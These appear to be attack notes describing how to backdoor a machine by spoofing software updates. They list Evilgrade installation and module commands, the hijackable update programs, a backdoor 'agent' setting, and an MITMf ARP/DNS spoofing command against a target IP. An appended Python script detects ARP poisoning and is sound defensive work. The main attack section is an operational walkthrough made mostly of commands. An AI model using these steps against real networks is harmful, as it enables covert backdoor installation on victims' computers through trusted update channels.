CLIENT SIDE ATTACKS
Backdoor delivery method 1 - Spoofing Software Updates
Fake an update for an already installed program.
Install the backdoor instead of the update.
Requires DNS spoofing and Evilgrade (a server to serve the update).
1. Download and install Evilgrade.
https://github.com/infobyte/evilgrade
git clone https://github.com/infobyte/evilgrade.git
cd evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML
OR
apt-get install isr-evilgrade
2. Start Evilgrade.
evilgrade
3. Check programs that can be hijacked.
show modules
List of modules:
===============
acer allmynotes amsn appleupdate appstore apptapp apt asus atube autoit3
bbappworld blackberry bsplayer ccleaner clamwin cpan cygwin dap divxsuite express_talk
fcleaner filezilla flashget flip4mac freerip fsecure_client getjar gom googleanalytics growl
inteldriver isopen istat itunes jdtoolkit jet jetphoto keepass lenovo lenovoapk
lenovofirmware linkedin miranda mirc nokia nokiasoftware notepadplus openbazaar openoffice opera
orbit osx paintnet panda_antirootkit photoscape port quicktime safari samsung skype
soapui sparkle sparkle2 speedbit sunbelt sunjava superantispyware teamviewer techtracker timedoctor
trillian ubertwitter vidbox virtualbox vmware winamp winscp winupdate winzip yahoomsn
- 80 modules available.
4. Select one.
configure [module]
5. Set backdoor location.
set agent [agent location]
6. Start server.
start
7. Start DNS spoofing and handler.
Modify the mitmf.conf file.
Start MITMF:
python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.21 -i eth0 --dns
Msf:
Install the update on the target machine. Then you can run the backdoor program.
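
Detection side of step 7, as an added example that is not part of the original notes: the ARP spoofing in that step leaves the gateway's IP mapped to another host's MAC in the target's neighbour cache, and this script checks `ip neigh show` output for that. The MAC addresses, the host 10.0.0.15 and the pinned gateway MAC are constructed sample values; only 10.0.0.1 and eth0 come from the command above.

```python
import re
from collections import defaultdict

# Matches `ip neigh show` lines that carry a link-layer (MAC) address.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})\b"
)

def parse_neigh(text):
    """Return {ip: mac}; FAILED/INCOMPLETE entries have no lladdr and are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def arp_findings(table, gateway, pinned_mac=None):
    """List signs that another host is answering ARP for the gateway."""
    gw_mac = table.get(gateway)
    if gw_mac is None:
        return []  # nothing cached for the gateway, nothing to compare
    findings = []
    # Check 1: gateway MAC differs from the known-good value recorded earlier.
    if pinned_mac and gw_mac != pinned_mac.lower():
        findings.append(f"gateway {gateway} is at {gw_mac}, expected {pinned_mac.lower()}")
    # Check 2: the gateway's MAC is also claimed by another IP on the segment.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    shared = sorted(ip for ip in by_mac[gw_mac] if ip != gateway)
    if shared:
        findings.append(f"{gw_mac} answers for gateway {gateway} and for {', '.join(shared)}")
    return findings

# Constructed sample data (assumption): MACs and 10.0.0.15 are made up.
PINNED_GW_MAC = "52:54:00:aa:bb:01"
CLEAN = """\
10.0.0.1 dev eth0 lladdr 52:54:00:aa:bb:01 REACHABLE
10.0.0.15 dev eth0 lladdr 08:00:27:11:22:33 STALE
10.0.0.9 dev eth0  FAILED
"""
POISONED = CLEAN.replace("52:54:00:aa:bb:01", "08:00:27:11:22:33")

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, arp_findings(parse_neigh(sample), "10.0.0.1", PINNED_GW_MAC))
```

On a live host, feed it the output of `ip neigh show` and a gateway MAC recorded while the network was known to be clean.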